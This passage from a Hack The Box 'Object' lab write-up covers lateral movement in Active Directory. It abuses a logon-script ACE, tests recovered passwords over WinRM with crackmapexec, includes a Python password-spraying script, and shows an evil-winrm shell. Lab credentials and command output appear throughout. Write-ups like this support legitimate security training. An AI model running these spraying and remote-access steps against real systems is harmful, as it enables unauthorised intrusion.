WinRM


The smith user holds a WriteProperty ACE over the maria user, which allows a threat actor to tamper with maria's scriptPath attribute and obtain code execution as maria the next time she logs on. I was able to [[Object_Logon_Script|exploit]] the said ACE (see [Logon Script](https://www.thehacker.recipes/ad/movement/dacl/logon-script)), and discovered an Excel file in the home directory of the maria user that contained 3 credentials. One of them is suspected to be a valid domain credential.

┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ crackmapexec winrm jenkins.object.local -u maria -p maria.passwd -d OBJECT.LOCAL 
HTTP        jenkins.object.local 5985   jenkins.object.local [*] http://jenkins.object.local:5985/wsman
WINRM       jenkins.object.local 5985   jenkins.object.local [-] object.local\maria:d34gb8@
WINRM       jenkins.object.local 5985   jenkins.object.local [-] object.local\maria:0de_434_d545
WINRM       jenkins.object.local 5985   jenkins.object.local [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)

The valid domain credential turned out to be maria:W3llcr4ft3d_4cls.
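The same check done programmatically, as an added example that is not part of the original writeup: the first function sprays a candidate list against the WinRM endpoint with pywinrm (stopping at the first password that yields a shell), and the second triages CrackMapExec-style output to pull out the working credential. It assumes `pip install pywinrm requests-ntlm`, the endpoint URL `http://jenkins.object.local:5985/wsman`, and NTLM transport; the embedded sample output is the crackmapexec run shown above, no passwords are invented. Every failed attempt raises the account's badPwdCount, so check the domain lockout policy before spraying more than a handful of guesses.

```python
"""Added example (not from the original writeup): spray candidate passwords
over WinRM with pywinrm, and triage CrackMapExec winrm output for the hit."""
import re

# Sample input: the crackmapexec output shown on this page (constructed copy).
CME_OUTPUT = """\
HTTP        jenkins.object.local 5985   jenkins.object.local [*] http://jenkins.object.local:5985/wsman
WINRM       jenkins.object.local 5985   jenkins.object.local [-] object.local\\maria:d34gb8@
WINRM       jenkins.object.local 5985   jenkins.object.local [-] object.local\\maria:0de_434_d545
WINRM       jenkins.object.local 5985   jenkins.object.local [+] object.local\\maria:W3llcr4ft3d_4cls (Pwn3d!)
"""

# proto  host  port  hostname  [+|-]  DOMAIN\user:password  [(Pwn3d!)]
# The password is matched lazily so a trailing " (Pwn3d!)" marker is not
# swallowed into it; a password may itself contain ':' or spaces.
_CME_LINE = re.compile(
    r"^\S+\s+\S+\s+\d+\s+\S+\s+\[(?P<mark>[+-])\]\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>[^:]+):(?P<password>.*?)"
    r"(?:\s+\(Pwn3d!\))?$"
)


def parse_cme_winrm(output):
    """Return one (domain, user, password, success) tuple per credential attempt.

    Banner lines such as the [*] endpoint line carry no credential and are skipped.
    """
    results = []
    for line in output.splitlines():
        m = _CME_LINE.match(line.rstrip())
        if not m:
            continue
        results.append((m["domain"], m["user"], m["password"], m["mark"] == "+"))
    return results


def valid_credentials(output):
    """Only the attempts CrackMapExec marked [+] (authenticated successfully)."""
    return [(d, u, p) for d, u, p, ok in parse_cme_winrm(output) if ok]


def spray_winrm(target_url, domain, user, candidates):
    """Try each candidate password over WinRM (NTLM); return the first one
    that gives a working shell, or None.

    Assumes pywinrm + requests-ntlm are installed (import is deferred so the
    parsing helpers above work without them). A 401 surfaces as
    InvalidCredentialsError, which is the normal 'wrong password' path here.
    """
    import winrm
    from winrm.exceptions import InvalidCredentialsError

    for password in candidates:
        session = winrm.Session(target_url, auth=(f"{domain}\\{user}", password), transport="ntlm")
        try:
            r = session.run_cmd("whoami")
        except InvalidCredentialsError:
            continue  # bad password; note this still counts toward lockout
        if r.status_code == 0:
            print(f"[+] {domain}\\{user}:{password} -> {r.std_out.decode(errors='replace').strip()}")
            return password
    return None


if __name__ == "__main__":
    # Offline triage of the page's output; the live spray would be e.g.
    # spray_winrm("http://jenkins.object.local:5985/wsman", "OBJECT.LOCAL", "maria",
    #             ["d34gb8@", "0de_434_d545", "W3llcr4ft3d_4cls"])
    for domain, user, password in valid_credentials(CME_OUTPUT):
        print(f"valid: {domain}\\{user}:{password}")
```

`spray_winrm` stops at the first success on purpose: once a password works there is no reason to keep burning bad-password attempts against the same account.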

┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i jenkins.object.local -u maria -p W3llcr4ft3d_4cls
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\maria
*Evil-WinRM* PS C:\Users\maria\Documents> hostname
jenkins
*Evil-WinRM* PS C:\Users\maria\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21f
   IPv6 Address. . . . . . . . . . . : dead:beef::bcc7:674e:326b:4143
   Link-local IPv6 Address . . . . . : fe80::bcc7:674e:326b:4143%12
   IPv4 Address. . . . . . . . . . . : 10.10.11.132
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

Lateral movement to the maria user achieved via WinRM.